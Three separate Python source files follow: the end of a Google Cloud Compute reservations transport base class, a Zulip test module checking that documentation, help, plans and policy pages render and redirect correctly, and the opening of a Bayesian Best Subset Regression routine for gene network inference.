            self.get_iam_policy: gapic_v1.method.wrap_method(
                self.get_iam_policy, default_timeout=None, client_info=client_info,
            ),
            self.insert: gapic_v1.method.wrap_method(
                self.insert, default_timeout=None, client_info=client_info,
            ),
            self.list: gapic_v1.method.wrap_method(
                self.list, default_timeout=None, client_info=client_info,
            ),
            self.resize: gapic_v1.method.wrap_method(
                self.resize, default_timeout=None, client_info=client_info,
            ),
            self.set_iam_policy: gapic_v1.method.wrap_method(
                self.set_iam_policy, default_timeout=None, client_info=client_info,
            ),
            self.test_iam_permissions: gapic_v1.method.wrap_method(
                self.test_iam_permissions,
                default_timeout=None,
                client_info=client_info,
            ),
            self.update: gapic_v1.method.wrap_method(
                self.update, default_timeout=None, client_info=client_info,
            ),
        }
    def close(self):
        """Closes resources associated with the transport.
        .. warning::
             Only call this method if the transport is NOT shared
             with other clients - this may cause errors in other clients!
        """
        raise NotImplementedError()
    # Each RPC below is exposed as a property returning the transport's
    # callable; synchronous transports return the response type directly,
    # async transports return an Awaitable of it. Subclasses must override.
    @property
    def aggregated_list(
        self,
    ) -> Callable[
        [compute.AggregatedListReservationsRequest],
        Union[
            compute.ReservationAggregatedList,
            Awaitable[compute.ReservationAggregatedList],
        ],
    ]:
        raise NotImplementedError()
    @property
    def delete(
        self,
    ) -> Callable[
        [compute.DeleteReservationRequest],
        Union[compute.Operation, Awaitable[compute.Operation]],
    ]:
        raise NotImplementedError()
    @property
    def get(
        self,
    ) -> Callable[
        [compute.GetReservationRequest],
        Union[compute.Reservation, Awaitable[compute.Reservation]],
    ]:
        raise NotImplementedError()
    @property
    def get_iam_policy(
        self,
    ) -> Callable[
        [compute.GetIamPolicyReservationRequest],
        Union[compute.Policy, Awaitable[compute.Policy]],
    ]:
        raise NotImplementedError()
    @property
    def insert(
        self,
    ) -> Callable[
        [compute.InsertReservationRequest],
        Union[compute.Operation, Awaitable[compute.Operation]],
    ]:
        raise NotImplementedError()
    @property
    def list(
        self,
    ) -> Callable[
        [compute.ListReservationsRequest],
        Union[compute.ReservationList, Awaitable[compute.ReservationList]],
    ]:
        raise NotImplementedError()
    @property
    def resize(
        self,
    ) -> Callable[
        [compute.ResizeReservationRequest],
        Union[compute.Operation, Awaitable[compute.Operation]],
    ]:
        raise NotImplementedError()
    @property
    def set_iam_policy(
        self,
    ) -> Callable[
        [compute.SetIamPolicyReservationRequest],
        Union[compute.Policy, Awaitable[compute.Policy]],
    ]:
        raise NotImplementedError()
    @property
    def test_iam_permissions(
        self,
    ) -> Callable[
        [compute.TestIamPermissionsReservationRequest],
        Union[
            compute.TestPermissionsResponse, Awaitable[compute.TestPermissionsResponse]
        ],
    ]:
        raise NotImplementedError()
    @property
    def update(
        self,
    ) -> Callable[
        [compute.UpdateReservationRequest],
        Union[compute.Operation, Awaitable[compute.Operation]],
    ]:
        raise NotImplementedError()
# Public API of this module.
__all__ = ("ReservationsTransport",)
|
|
import os
import re
from typing import Any, Dict, Sequence
from unittest import mock, skipUnless
from urllib.parse import urlsplit
import orjson
from django.conf import settings
from django.http import HttpResponse
from django.test import override_settings
from django.utils.timezone import now as timezone_now
from corporate.models import Customer, CustomerPlan
from zerver.context_processors import get_apps_page_url
from zerver.lib.integrations import INTEGRATIONS
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import HostRequestMock
from zerver.models import Realm, get_realm
from zerver.views.documentation import add_api_uri_context
class DocPageTest(ZulipTestCase):
    """Smoke tests: portico/documentation pages render with the expected
    content on realm subdomains, the root domain, and the landing page."""

    def get_doc(self, url: str, subdomain: str) -> HttpResponse:
        """Fetch a documentation URL; doc-html fragments are only served to
        AJAX requests, so add the XHR header for those."""
        if url.startswith("/integrations/doc-html/"):
            return self.client_get(url, subdomain=subdomain, HTTP_X_REQUESTED_WITH="XMLHttpRequest")
        return self.client_get(url, subdomain=subdomain)

    def print_msg_if_error(self, url: str, response: HttpResponse) -> None:  # nocoverage
        """Dump the server's JSON error message to make failures debuggable."""
        if response.status_code == 200:
            return
        print("Error processing URL:", url)
        if response.get("Content-Type") == "application/json":
            content = orjson.loads(response.content)
            print()
            print("======================================================================")
            print("ERROR: {}".format(content.get("msg")))
            print()

    def _test(
        self,
        url: str,
        expected_content: str,
        # Immutable defaults: the original used mutable [] defaults; these
        # sequences are only iterated, so () is behavior-compatible.
        extra_strings: Sequence[str] = (),
        landing_missing_strings: Sequence[str] = (),
        landing_page: bool = True,
        doc_html_str: bool = False,
    ) -> None:
        """Check that `url` serves `expected_content` (plus extra_strings) on
        the "zephyr" subdomain and the root domain, and — unless landing_page
        is False — again with ROOT_DOMAIN_LANDING_PAGE enabled, where
        landing_missing_strings must be absent. doc_html_str marks raw HTML
        fragments that carry no robots/description meta tags."""
        # Test the URL on the "zephyr" subdomain
        result = self.get_doc(url, subdomain="zephyr")
        self.print_msg_if_error(url, result)
        self.assertEqual(result.status_code, 200)
        self.assertIn(expected_content, str(result.content))
        for s in extra_strings:
            self.assertIn(s, str(result.content))
        if not doc_html_str:
            self.assert_in_success_response(
                ['<meta name="robots" content="noindex,nofollow" />'], result
            )
        # Test the URL on the root subdomain
        result = self.get_doc(url, subdomain="")
        self.print_msg_if_error(url, result)
        self.assertEqual(result.status_code, 200)
        self.assertIn(expected_content, str(result.content))
        if not doc_html_str:
            self.assert_in_success_response(
                ['<meta name="robots" content="noindex,nofollow" />'], result
            )
        for s in extra_strings:
            self.assertIn(s, str(result.content))
        if not landing_page:
            return
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            # Test the URL on the root subdomain with the landing page setting
            result = self.get_doc(url, subdomain="")
            self.print_msg_if_error(url, result)
            self.assertEqual(result.status_code, 200)
            self.assertIn(expected_content, str(result.content))
            for s in extra_strings:
                self.assertIn(s, str(result.content))
            for s in landing_missing_strings:
                self.assertNotIn(s, str(result.content))
            if not doc_html_str:
                # Every page has a meta-description
                self.assert_in_success_response(['<meta name="description" content="'], result)
                self.assert_not_in_success_response(
                    ['<meta name="robots" content="noindex,nofollow" />'], result
                )
            # Test the URL on the "zephyr" subdomain with the landing page setting
            result = self.get_doc(url, subdomain="zephyr")
            self.print_msg_if_error(url, result)
            self.assertEqual(result.status_code, 200)
            self.assertIn(expected_content, str(result.content))
            for s in extra_strings:
                self.assertIn(s, str(result.content))
            if not doc_html_str:
                self.assert_in_success_response(
                    ['<meta name="robots" content="noindex,nofollow" />'], result
                )

    def test_api_doc_endpoints(self) -> None:
        """Every endpoint linked from the /api/ sidebar must render."""
        # We extract the set of /api/ endpoints to check by parsing
        # the /api/ page sidebar for links starting with /api/.
        api_page_raw = str(self.client_get("/api/").content)
        ENDPOINT_REGEXP = re.compile(r"href=\"/api/\s*(.*?)\"")
        endpoint_list_set = set(re.findall(ENDPOINT_REGEXP, api_page_raw))
        endpoint_list = [f"/api/{endpoint}" for endpoint in endpoint_list_set]
        # Validate that the parsing logic isn't broken, since if it
        # broke, the below would become a noop.
        self.assertGreater(len(endpoint_list), 70)
        for endpoint in endpoint_list:
            self._test(endpoint, "", doc_html_str=True)
        result = self.client_get(
            "/api/nonexistent-page",
            follow=True,
            HTTP_X_REQUESTED_WITH="XMLHttpRequest",
        )
        self.assertEqual(result.status_code, 404)

    def test_doc_endpoints(self) -> None:
        """Spot-check well-known documentation and portico pages."""
        self._test("/api/", "The Zulip API")
        self._test("/api/api-keys", "be careful with it")
        self._test("/api/installation-instructions", "No download required!")
        self._test("/api/send-message", "steal away your hearts")
        self._test("/api/render-message", "**foo**")
        self._test("/api/get-streams", "include_public")
        self._test("/api/get-stream-id", "The name of the stream to access.")
        self._test("/api/get-subscriptions", "Get all streams that the user is subscribed to.")
        self._test("/api/get-users", "client_gravatar")
        self._test("/api/register-queue", "apply_markdown")
        self._test("/api/get-events", "dont_block")
        self._test("/api/delete-queue", "Delete a previously registered queue")
        self._test("/api/update-message", "propagate_mode")
        self._test("/api/get-own-user", "does not accept any parameters.")
        self._test("/api/subscribe", "authorization_errors_fatal")
        self._test("/api/create-user", "zuliprc-admin")
        self._test("/api/unsubscribe", "not_removed")
        if settings.ZILENCER_ENABLED:
            self._test("/team/", "industry veterans")
        self._test("/history/", "Cambridge, Massachusetts")
        # Test the i18n version of one of these pages.
        self._test("/en/history/", "Cambridge, Massachusetts")
        if settings.ZILENCER_ENABLED:
            self._test("/apps/", "Apps for every platform.")
        self._test("/features/", "Beautiful messaging")
        self._test("/hello/", "Chat for distributed teams", landing_missing_strings=["Log in"])
        self._test("/development-community/", "Zulip development community")
        self._test("/why-zulip/", "Why Zulip?")
        self._test("/for/open-source/", "for open source projects")
        self._test("/for/events/", "for conferences and events")
        self._test("/for/education/", "education pricing")
        self._test("/case-studies/tum/", "Technical University of Munich")
        self._test("/case-studies/ucsd/", "UCSD")
        self._test("/case-studies/rust/", "Rust programming language")
        self._test("/case-studies/lean/", "Lean theorem prover")
        self._test("/for/research/", "for research")
        self._test("/for/business/", "Communication efficiency represents")
        self._test("/for/communities/", "Zulip for communities")
        self._test("/security/", "TLS encryption")
        self._test("/attribution/", "Attributions")
        self._test("/devlogin/", "Normal users", landing_page=False)
        self._test("/devtools/", "Useful development URLs")
        self._test("/errors/404/", "Page not found")
        self._test("/errors/5xx/", "Internal server error")
        self._test("/emails/", "manually generate most of the emails by clicking")
        result = self.client_get(
            "/integrations/doc-html/nonexistent_integration",
            follow=True,
            HTTP_X_REQUESTED_WITH="XMLHttpRequest",
        )
        self.assertEqual(result.status_code, 404)
        result = self.client_get("/new-user/")
        self.assertEqual(result.status_code, 301)
        self.assertIn("hello", result["Location"])
        result = self.client_get("/developer-community/")
        self.assertEqual(result.status_code, 301)
        self.assertIn("development-community", result["Location"])
        result = self.client_get("/for/companies/", follow=True)
        self.assert_in_success_response(["Communication efficiency represents"], result)

    def test_portico_pages_open_graph_metadata(self) -> None:
        """Key portico pages carry Open Graph title/description tags."""
        # Why Zulip
        url = "/why-zulip/"
        title = '<meta property="og:title" content="Team chat with first-class threading" />'
        description = '<meta property="og:description" content="Most team chats are overwhelming'
        self._test(url, title, doc_html_str=True)
        self._test(url, description, doc_html_str=True)
        # Features
        url = "/features/"
        title = '<meta property="og:title" content="Zulip features" />'
        description = '<meta property="og:description" content="First class threading'
        self._test(url, title, doc_html_str=True)
        self._test(url, description, doc_html_str=True)

    def test_integration_doc_endpoints(self) -> None:
        """Every registered integration's doc-html fragment must render."""
        self._test(
            "/integrations/",
            "native integrations.",
            extra_strings=[
                "And hundreds more through",
                "Zapier",
                "IFTTT",
            ],
        )
        for integration in INTEGRATIONS.keys():
            url = f"/integrations/doc-html/{integration}"
            self._test(url, "", doc_html_str=True)

    def test_integration_pages_open_graph_metadata(self) -> None:
        """Integration, category, and index pages carry Open Graph tags."""
        url = "/integrations/doc/github"
        title = '<meta property="og:title" content="Connect GitHub to Zulip" />'
        description = '<meta property="og:description" content="Zulip comes with over'
        self._test(url, title, doc_html_str=True)
        self._test(url, description, doc_html_str=True)
        # Test category pages
        url = "/integrations/communication"
        title = '<meta property="og:title" content="Connect your Communication tools to Zulip" />'
        description = '<meta property="og:description" content="Zulip comes with over'
        self._test(url, title, doc_html_str=True)
        self._test(url, description, doc_html_str=True)
        # Test integrations page
        url = "/integrations/"
        title = '<meta property="og:title" content="Connect the tools you use to Zulip" />'
        description = '<meta property="og:description" content="Zulip comes with over'
        self._test(url, title, doc_html_str=True)
        self._test(url, description, doc_html_str=True)

    def test_doc_html_str_non_ajax_call(self) -> None:
        """doc-html fragments must 404 when fetched without the XHR header."""
        # We don't need to test all the pages for 404; a handful suffices.
        # Fix: the original wrote `[5]`, which iterated the *characters* of
        # the sixth integration's name instead of the first five integrations.
        for integration in list(INTEGRATIONS.keys())[:5]:
            with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
                url = f"/en/integrations/doc-html/{integration}"
                result = self.client_get(url, subdomain="", follow=True)
                self.assertEqual(result.status_code, 404)
                result = self.client_get(url, subdomain="zephyr", follow=True)
                self.assertEqual(result.status_code, 404)
            url = f"/en/integrations/doc-html/{integration}"
            result = self.client_get(url, subdomain="", follow=True)
            self.assertEqual(result.status_code, 404)
            result = self.client_get(url, subdomain="zephyr", follow=True)
            self.assertEqual(result.status_code, 404)
        result = self.client_get("/integrations/doc-html/nonexistent_integration", follow=True)
        self.assertEqual(result.status_code, 404)

    def test_electron_detection(self) -> None:
        """The page records the client platform for the desktop app."""
        result = self.client_get("/accounts/password/reset/")
        # TODO: Ideally, this Mozilla would be the specific browser.
        self.assertTrue('data-platform="Mozilla"' in result.content.decode())
        result = self.client_get("/accounts/password/reset/", HTTP_USER_AGENT="ZulipElectron/1.0.0")
        self.assertTrue('data-platform="ZulipElectron"' in result.content.decode())
class HelpTest(ZulipTestCase):
    """/help articles rewrite in-app links: clickable on a realm subdomain,
    plain bold text on the landing-page root domain."""

    def test_help_settings_links(self) -> None:
        response = self.client_get("/help/change-the-time-format")
        self.assertEqual(response.status_code, 200)
        page = str(response.content)
        self.assertIn(
            'Go to <a href="/#settings/display-settings">Display settings</a>', page
        )
        # The sidebar should be rendered alongside the article.
        self.assertIn("Getting started with Zulip", page)
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            response = self.client_get("/help/change-the-time-format", subdomain="")
            self.assertEqual(response.status_code, 200)
            page = str(response.content)
            self.assertIn("<strong>Display settings</strong>", page)
            self.assertNotIn("/#settings", page)

    def test_help_relative_links_for_gear(self) -> None:
        response = self.client_get("/help/analytics")
        self.assertEqual(response.status_code, 200)
        page = str(response.content)
        self.assertIn('<a href="/stats">Usage statistics</a>', page)
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            response = self.client_get("/help/analytics", subdomain="")
            self.assertEqual(response.status_code, 200)
            page = str(response.content)
            self.assertIn("<strong>Usage statistics</strong>", page)
            self.assertNotIn("/stats", page)

    def test_help_relative_links_for_stream(self) -> None:
        response = self.client_get("/help/message-a-stream-by-email")
        self.assertEqual(response.status_code, 200)
        page = str(response.content)
        self.assertIn('<a href="/#streams/subscribed">Your streams</a>', page)
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            response = self.client_get("/help/message-a-stream-by-email", subdomain="")
            self.assertEqual(response.status_code, 200)
            page = str(response.content)
            self.assertIn("<strong>Manage streams</strong>", page)
            self.assertNotIn("/#streams", page)
class IntegrationTest(ZulipTestCase):
    def test_check_if_every_integration_has_logo_that_exists(self) -> None:
        """Every registered integration's logo URL must resolve to a real
        file under DEPLOY_ROOT."""
        for integration in INTEGRATIONS.values():
            path = urlsplit(integration.logo_url).path
            self.assertTrue(os.path.isfile(settings.DEPLOY_ROOT + path), integration.name)
    def test_api_url_view_subdomains_base(self) -> None:
        """On the bare test server, the API docs point at its own /api."""
        context: Dict[str, Any] = {}
        add_api_uri_context(context, HostRequestMock())
        self.assertEqual(context["api_url_scheme_relative"], "testserver/api")
        self.assertEqual(context["api_url"], "http://testserver/api")
        self.assertTrue(context["html_settings_links"])
    @override_settings(ROOT_DOMAIN_LANDING_PAGE=True)
    def test_api_url_view_subdomains_homepage_base(self) -> None:
        """On the landing-page root domain, docs show a placeholder realm
        domain and disable HTML settings links."""
        context: Dict[str, Any] = {}
        add_api_uri_context(context, HostRequestMock())
        self.assertEqual(context["api_url_scheme_relative"], "yourZulipDomain.testserver/api")
        self.assertEqual(context["api_url"], "http://yourZulipDomain.testserver/api")
        self.assertFalse(context["html_settings_links"])
    def test_api_url_view_subdomains_full(self) -> None:
        """A realm-subdomain request yields that subdomain's API URL."""
        context: Dict[str, Any] = {}
        request = HostRequestMock(host="mysubdomain.testserver")
        add_api_uri_context(context, request)
        self.assertEqual(context["api_url_scheme_relative"], "mysubdomain.testserver/api")
        self.assertEqual(context["api_url"], "http://mysubdomain.testserver/api")
        self.assertTrue(context["html_settings_links"])
    def test_html_settings_links(self) -> None:
        """settings/subscriptions links are plain text on the landing-page
        root domain, and clickable anchors everywhere else."""
        context: Dict[str, Any] = {}
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            add_api_uri_context(context, HostRequestMock())
            self.assertEqual(context["settings_html"], "Zulip settings page")
            self.assertEqual(context["subscriptions_html"], "streams page")
        context = {}
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            add_api_uri_context(context, HostRequestMock(host="mysubdomain.testserver"))
            self.assertEqual(context["settings_html"], '<a href="/#settings">Zulip settings page</a>')
            self.assertEqual(
                context["subscriptions_html"], '<a target="_blank" href="/#streams">streams page</a>'
            )
        context = {}
        add_api_uri_context(context, HostRequestMock())
        self.assertEqual(context["settings_html"], '<a href="/#settings">Zulip settings page</a>')
        self.assertEqual(
            context["subscriptions_html"], '<a target="_blank" href="/#streams">streams page</a>'
        )
class AboutPageTest(ZulipTestCase):
    @skipUnless(settings.ZILENCER_ENABLED, "requires zilencer")
    def test_endpoint(self) -> None:
        """/team/ renders contributor data from the fixture, degrades
        gracefully when the data file is missing, and redirects to
        zulip.com when zilencer is disabled."""
        with self.settings(CONTRIBUTOR_DATA_FILE_PATH="zerver/tests/fixtures/authors.json"):
            result = self.client_get("/team/")
        self.assert_in_success_response(["Our amazing community"], result)
        self.assert_in_success_response(["2017-11-20"], result)
        self.assert_in_success_response(["timabbott", "showell", "gnprice", "rishig"], result)
        # Simulate a missing contributor-data file: the page still renders.
        with mock.patch("zerver.views.portico.open", side_effect=FileNotFoundError) as m:
            result = self.client_get("/team/")
            self.assertEqual(result.status_code, 200)
            self.assert_in_success_response(["Never ran"], result)
        m.assert_called_once()
        with self.settings(ZILENCER_ENABLED=False):
            result = self.client_get("/team/")
            self.assertEqual(result.status_code, 301)
            self.assertEqual(result["Location"], "https://zulip.com/team/")
class SmtpConfigErrorTest(ZulipTestCase):
    """The SMTP config-error page renders with an email-setup hint."""

    def test_smtp_error(self) -> None:
        response = self.client_get("/config-error/smtp")
        self.assertEqual(response.status_code, 200)
        self.assert_in_success_response(["email configuration"], response)
class PlansPageTest(ZulipTestCase):
    def test_plans_auth(self) -> None:
        """Access control for /plans/: root domain is public, nonexistent
        realms 404, anonymous realm visitors are sent to login, guests get
        404, and members see the realm's plan."""
        root_domain = ""
        result = self.client_get("/plans/", subdomain=root_domain)
        self.assert_in_success_response(["Self-host Zulip"], result)
        self.assert_not_in_success_response(["/upgrade#sponsorship"], result)
        self.assert_in_success_response(["/accounts/go/?next=/upgrade%23sponsorship"], result)
        non_existent_domain = "moo"
        result = self.client_get("/plans/", subdomain=non_existent_domain)
        self.assertEqual(result.status_code, 404)
        self.assert_in_response("does not exist", result)
        realm = get_realm("zulip")
        realm.plan_type = Realm.PLAN_TYPE_STANDARD_FREE
        realm.save(update_fields=["plan_type"])
        # Anonymous users are redirected to login before seeing realm plans.
        result = self.client_get("/plans/", subdomain="zulip")
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result["Location"], "/accounts/login/?next=/plans")
        guest_user = "polonius"
        self.login(guest_user)
        result = self.client_get("/plans/", subdomain="zulip", follow=True)
        self.assertEqual(result.status_code, 404)
        organization_member = "hamlet"
        self.login(organization_member)
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response(["Current plan"], result)
        self.assert_in_success_response(["/upgrade#sponsorship"], result)
        self.assert_not_in_success_response(["/accounts/go/?next=/upgrade%23sponsorship"], result)
        # Test root domain, with login on different domain
        result = self.client_get("/plans/", subdomain="")
        # TODO: works in manual testing, but I suspect something is funny in
        # the test environment
        # self.assert_in_success_response(["Sign up now"], result)
    def test_CTA_text_by_plan_type(self) -> None:
        """The call-to-action shown on /plans/ must track the realm's plan
        type and billing state (trial, sponsorship pending, etc.).
        NOTE: assertions are order-dependent — each section mutates the
        realm/customer state used by the next."""
        sign_up_now = "Create organization"
        upgrade_to_standard = "Upgrade to Standard"
        current_plan = "Current plan"
        sponsorship_pending = "Sponsorship pending"
        # Root domain
        result = self.client_get("/plans/", subdomain="")
        self.assert_in_success_response([sign_up_now, upgrade_to_standard], result)
        self.assert_not_in_success_response([current_plan, sponsorship_pending], result)
        realm = get_realm("zulip")
        realm.plan_type = Realm.PLAN_TYPE_SELF_HOSTED
        realm.save(update_fields=["plan_type"])
        with self.settings(PRODUCTION=True):
            result = self.client_get("/plans/", subdomain="zulip")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result["Location"], "https://zulip.com/plans")
            self.login("iago")
            # SELF_HOSTED should hide the local plans page, even if logged in
            result = self.client_get("/plans/", subdomain="zulip")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result["Location"], "https://zulip.com/plans")
        # But in the development environment, it renders a page
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response([sign_up_now, upgrade_to_standard], result)
        self.assert_not_in_success_response([current_plan, sponsorship_pending], result)
        realm.plan_type = Realm.PLAN_TYPE_LIMITED
        realm.save(update_fields=["plan_type"])
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response([current_plan, upgrade_to_standard], result)
        self.assert_not_in_success_response([sign_up_now, sponsorship_pending], result)
        with self.settings(FREE_TRIAL_DAYS=60):
            result = self.client_get("/plans/", subdomain="zulip")
            self.assert_in_success_response([current_plan, "Start 60 day free trial"], result)
            self.assert_not_in_success_response(
                [sign_up_now, sponsorship_pending, upgrade_to_standard], result
            )
        realm.plan_type = Realm.PLAN_TYPE_STANDARD_FREE
        realm.save(update_fields=["plan_type"])
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response([current_plan], result)
        self.assert_not_in_success_response(
            [sign_up_now, upgrade_to_standard, sponsorship_pending], result
        )
        realm.plan_type = Realm.PLAN_TYPE_STANDARD
        realm.save(update_fields=["plan_type"])
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response([current_plan], result)
        self.assert_not_in_success_response(
            [sign_up_now, upgrade_to_standard, sponsorship_pending], result
        )
        customer = Customer.objects.create(realm=get_realm("zulip"), stripe_customer_id="cus_id")
        plan = CustomerPlan.objects.create(
            customer=customer,
            tier=CustomerPlan.STANDARD,
            status=CustomerPlan.FREE_TRIAL,
            billing_cycle_anchor=timezone_now(),
            billing_schedule=CustomerPlan.MONTHLY,
        )
        result = self.client_get("/plans/", subdomain="zulip")
        self.assert_in_success_response(["Current plan (free trial)"], result)
        self.assert_not_in_success_response(
            [sign_up_now, upgrade_to_standard, sponsorship_pending], result
        )
        realm.plan_type = Realm.PLAN_TYPE_LIMITED
        realm.save()
        customer.sponsorship_pending = True
        customer.save()
        plan.delete()
        result = self.client_get("/plans/", subdomain="zulip")
        # NOTE(review): the next assertion is subsumed by the one after it;
        # it appears redundant but is kept to preserve behavior exactly.
        self.assert_in_success_response([current_plan], result)
        self.assert_in_success_response([current_plan, sponsorship_pending], result)
        self.assert_not_in_success_response([sign_up_now, upgrade_to_standard], result)
class AppsPageTest(ZulipTestCase):
    """/apps routing: local page with zilencer, zulip.com redirect without."""

    def test_get_apps_page_url(self) -> None:
        with self.settings(ZILENCER_ENABLED=False):
            self.assertEqual(get_apps_page_url(), "https://zulip.com/apps/")
        with self.settings(ZILENCER_ENABLED=True):
            self.assertEqual(get_apps_page_url(), "/apps/")

    def test_apps_view(self) -> None:
        response = self.client_get("/apps")
        self.assertEqual(response.status_code, 301)
        self.assertTrue(response["Location"].endswith("/apps/"))
        with self.settings(ZILENCER_ENABLED=False):
            response = self.client_get("/apps/")
            self.assertEqual(response.status_code, 301)
            self.assertEqual(response["Location"], "https://zulip.com/apps/")
            response = self.client_get("/apps/linux")
            self.assertEqual(response.status_code, 301)
            self.assertEqual(response["Location"], "https://zulip.com/apps/")
        with self.settings(ZILENCER_ENABLED=True):
            response = self.client_get("/apps/")
        self.assertEqual(response.status_code, 200)
        self.assertIn("Apps for every platform.", response.content.decode())

    def test_app_download_link_view(self) -> None:
        download_url = "https://desktop-download.zulip.com/v5.4.3/Zulip-Web-Setup-5.4.3.exe"
        with mock.patch(
            "zerver.views.portico.get_latest_github_release_download_link_for_platform",
            return_value=download_url,
        ) as patched:
            response = self.client_get("/apps/download/windows")
            patched.assert_called_once_with("windows")
            self.assertEqual(response.status_code, 302)
            self.assertEqual(response["Location"], download_url)
        # Unknown platforms are rejected.
        response = self.client_get("/apps/download/plan9")
        self.assertEqual(response.status_code, 404)
class PrivacyTermsTest(ZulipTestCase):
    def test_terms_and_policies_index(self) -> None:
        """The policies index renders from the configured directory."""
        with self.settings(POLICIES_DIRECTORY="corporate/policies"):
            response = self.client_get("/policies/")
            self.assert_in_success_response(["Terms and policies"], response)
    def test_custom_terms_of_service_template(self) -> None:
        """Missing policies directory yields the not-configured notice;
        the corporate directory yields the real terms."""
        not_configured_message = "This server is an installation"
        with self.settings(POLICIES_DIRECTORY="zerver/policies_absent"):
            response = self.client_get("/policies/terms")
            self.assert_in_response(not_configured_message, response)
        with self.settings(POLICIES_DIRECTORY="corporate/policies"):
            response = self.client_get("/policies/terms")
            self.assert_in_success_response(["Kandra Labs"], response)
    def test_custom_privacy_policy_template(self) -> None:
        """Same as the terms test, for the privacy policy page."""
        not_configured_message = "This server is an installation"
        with self.settings(POLICIES_DIRECTORY="zerver/policies_absent"):
            response = self.client_get("/policies/privacy")
            self.assert_in_response(not_configured_message, response)
        with self.settings(POLICIES_DIRECTORY="corporate/policies"):
            response = self.client_get("/policies/privacy")
            self.assert_in_success_response(["Kandra Labs"], response)
    def test_custom_privacy_policy_template_with_absolute_url(self) -> None:
        """Verify that using our recommended production default of an absolute path
        like /etc/zulip/policies/ works."""
        current_dir = os.path.dirname(os.path.abspath(__file__))
        abs_path = os.path.abspath(
            os.path.join(current_dir, "..", "..", "templates/corporate/policies")
        )
        with self.settings(POLICIES_DIRECTORY=abs_path):
            response = self.client_get("/policies/privacy")
            self.assert_in_success_response(["Kandra Labs"], response)
        with self.settings(POLICIES_DIRECTORY=abs_path):
            response = self.client_get("/policies/nonexistent")
            self.assert_in_response("No such page", response)
    def test_redirects_from_older_urls(self) -> None:
        """Legacy /privacy/ and /terms/ URLs redirect to the policies app."""
        with self.settings(POLICIES_DIRECTORY="corporate/policies"):
            result = self.client_get("/privacy/", follow=True)
            self.assert_in_success_response(["Kandra Labs"], result)
        with self.settings(POLICIES_DIRECTORY="corporate/policies"):
            result = self.client_get("/terms/", follow=True)
            self.assert_in_success_response(["Kandra Labs"], result)
    def test_no_nav(self) -> None:
        # Test that our ?nav=0 feature of /privacy and /terms,
        # designed to comply with the Apple App Store draconian
        # policies that ToS/Privacy pages linked from an iOS app have
        # no links to the rest of the site if there's pricing
        # information for anything elsewhere on the site.
        # We don't have this link at all on these pages; this first
        # line of the test would change if we were to adjust the
        # design.
        response = self.client_get("/policies/terms")
        self.assert_not_in_success_response(["Back to Zulip"], response)
        response = self.client_get("/policies/terms", {"nav": "no"})
        self.assert_not_in_success_response(["Back to Zulip"], response)
        response = self.client_get("/policies/privacy", {"nav": "no"})
        self.assert_not_in_success_response(["Back to Zulip"], response)
|
|
import pandas as pd
import numpy as np
import itertools
from itertools import compress
import math
from scipy import special
import multiprocessing
from functools import partial
import os, sys
from . import utils
# Module-level globals used to hand the (large, read-only) BBSR inputs to the
# per-gene worker without passing them through every call: design matrix,
# response matrix, possible-predictor mask, weights matrix and predictor
# count. They are populated by BBSR() before the per-gene loop runs.
gx, gy, gpp, gwm, gns = None, None, None, None, None

# Wrapper function for BBSRforOneGene that's called in BBSR; it binds the
# globals set up by BBSR() so only the gene index needs to travel.
def BBSRforOneGeneWrapper(ind): return BBSRforOneGene(ind, gx, gy, gpp, gwm, gns)
def BBSR(X, Y, clr_mat, nS, no_pr_val, weights_mat, prior_mat, kvs, rank, ownCheck):
    """Bayesian Best Subset Regression over all genes, split across workers.

    Args:
        X: TF expression matrix (TFs x conditions).
        Y: gene expression matrix (genes x conditions).
        clr_mat: CLR scores, genes x TFs; used to pick top predictors.
        nS: number of top-CLR predictors to add per gene.
        no_pr_val: weight value that marks "no prior" entries in weights_mat.
        weights_mat: prior weights, genes x TFs.
        prior_mat: prior connectivity matrix, genes x TFs.
        kvs: key-value store used to exchange partial results between
            workers (assumes a SLURM job; see SLURM_NTASKS below).
        rank: id of this worker; rank 0 gathers all partial results.
        ownCheck: iterator of booleans; gene j is processed by this worker
            when next(ownCheck) is truthy.

    Returns:
        On rank 0, the list of per-gene result dicts; None on other ranks.
    """
    G = Y.shape[0]  # number of genes
    genes = Y.index.values.tolist()
    K = X.shape[0]  # max number of possible predictors (number of TFs)
    tfs = X.index.values.tolist()
    # Scale and permute design and response matrix: z-score every row
    X = ((X.transpose() - X.transpose().mean()) / X.transpose().std(ddof=1)).transpose()
    Y = ((Y.transpose() - Y.transpose().mean()) / Y.transpose().std(ddof=1)).transpose()
    weights_mat = weights_mat.loc[genes,tfs]
    clr_mat = clr_mat.loc[genes, tfs]
    prior_mat = prior_mat.loc[genes, tfs]
    # keep all predictors that we have priors for
    pp = pd.DataFrame(((prior_mat.ix[:,:] != 0)|(weights_mat.ix[:,:]!=no_pr_val)) & ~pd.isnull(clr_mat))
    mask = clr_mat == 0
    # for each gene, add the top nS predictors of the list to possible predictors
    clr_mat[mask] = np.nan
    for ind in range(0,G):
        # NaN CLR entries sort to the end of argsort; count them so they can
        # be excluded from the descending ranking below
        clr_na = len(np.argwhere(np.isnan(clr_mat.ix[ind,])).flatten().tolist())
        clr_w_na = np.argsort(clr_mat.ix[ind,].tolist())
        if clr_na>0:
            clr_order = clr_w_na[:-clr_na][::-1]
        else:
            clr_order = clr_w_na[:][::-1]
        pp.ix[ind, clr_order[0:min(K, nS, len(clr_order))]] = True
    # a gene that is itself a TF must not predict itself: clear the diagonal
    preds = np.intersect1d(genes, tfs)
    subset = pp.ix[preds,preds].values
    np.fill_diagonal(subset,False)
    pp=pp.set_value(preds, preds, subset)
    out_list=[]
